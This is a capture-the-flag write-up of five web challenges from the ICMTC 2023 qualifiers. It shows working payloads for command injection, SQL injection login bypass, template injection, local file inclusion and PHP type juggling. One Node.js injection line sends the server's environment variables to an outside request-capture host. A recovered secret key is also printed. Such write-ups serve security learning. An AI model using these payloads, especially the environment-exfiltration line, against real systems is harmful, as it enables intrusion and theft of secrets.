ICMTC CTF Qualifications 2023 Web Challenge Write-up

Hi , My name is Ahmed Magdy :)

I would like to thank all the organizers for this CTF

ICMTC CTF

Let’s go solving the web challenge

Ah shit, here we go again.

1 - Challenge Name : Ping me

Ping

A ping (Packet Internet or Inter-Network Groper) is a basic Internet program that allows a user to test and verify if a particular destination IP address exist

This input using the terminal linux and print the output of commend

;ls

When input any commend with spaces it is donot allowd

No Hacking Please!

I have trick using commed without any spaces

After researc in server i find dir name /tmp

After reading the content files i find many flags one of them is correct

2 - Challenge Name : Comparison

This code php comparison the input in patametr text

If the condition true and true will print the flag

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md

I have found that 0010e2 = 1e3 = 1000

The correct flag is when 1000 in text parameter

3 - Challenge Name : hidden in plain sight

Nothing Here

I don’t find anything in source code

Let’s see what is in robots.txt

/su3rSecrttttt/

When open the /su3rSecrttttt/ it is redirction to login page

i will try SQL injection if anything happens

SQL injection error

new i need bypass the login page

Input in username admin’# and any password

admin’# and any password

Looool Fake FlAG :(

When open the /su3rSecrttttt/ again becous iam logined as admin

4- Challenge Name : EvilCalc

When i see the challenge think it is SSTI

So let’s do it the vlun parametr is taxes

{{‘’|attr(‘__class__’)|attr(‘__base__’)|attr(‘__subclasses__’)()}}

after try some method i send the request to my server

It is work i inderstand the ReferenceError and i will send onathe request but with {JSON.stringify(process.env)

{var%20http=require(‘http’);http.get(`http://ahmed.free.beeceptor.com/?data=${JSON.stringify(process.env)}`)}

5- Challenge Name : Maze

After creat account and login : admin@admin.com

get the fake flag again

NOT_REAL_FLAG

I find comment in source code

<!-- The developer forget to remove /read_file?file -->

it is LFI vlun and i can read some file

and The debugger caught an exception in your WSGI application is run

app.py

read the app.py file with LFI

after code review fine the Reset Password function is vlun with AES-128-padding-attack

when input any mail will creat reset token

I create script to get the secret key >> resources

22@@@@Th!S_!s_s3cr3t113337771!!@@

Aftrer i get the secret key i change the role from user to admin

End the web challenge…… I solve it :)

Thank you for your time to read this write-up :)

Contact me if you want : Facebook or LinkedIn